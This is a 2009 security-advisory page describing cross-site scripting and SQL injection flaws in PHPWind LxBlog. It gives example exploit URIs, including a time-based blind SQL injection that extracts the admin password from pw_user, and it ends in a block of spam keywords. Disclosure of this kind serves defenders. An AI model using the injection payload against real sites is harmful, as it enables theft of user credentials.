about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , LxBlog Multiple Cross Site Scripting and SQL Injection Vulnerabilities


Title LxBlog Multiple Cross Site Scripting and SQL Injection Vulnerabilities
Published 2009-05-22-12:00AM
Updated 2009-05-22-07:10PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Securitylab.ir
Vulnerable  PHPWind LxBlog 0
Not Vulnerable  
Code  An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.The following example URIs are available:http://www.example.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*http://www.example.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 12:59:37 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
live shows ASIAN4YOU. PHP multip t54t download D vbulletin www.whlblp Www.video. fhm magazi www.1069sm all cartoo iilokeryri longmovie raki Xxxgirls.s www.43job. www.KongAB news for c Free 3gp i iran69x.co ATOMIC Vir news for C www.mb86.c www.1893d. www.1893d. keralasexs mambo+Remo Zip aks.iraniy 3gp video Crack Data maxcpm.inf www.trish squirrelma www.my168. dasibaba+b Flog free xxxvi bebes mmap www.sexmov php-nuke+2 _1componen pussy vedi suse remot cops sexbaby.co SEXY HOT G mambo Remo +www.trish